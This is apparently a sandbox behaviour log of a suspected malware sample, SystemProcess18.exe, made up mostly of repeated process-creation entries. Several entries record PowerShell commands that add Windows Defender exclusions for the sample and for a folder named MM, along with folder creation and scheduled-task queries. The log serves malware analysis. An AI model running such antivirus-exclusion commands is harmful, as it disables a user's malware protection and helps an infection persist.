Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process created: unknown unknown	Jump to behavior
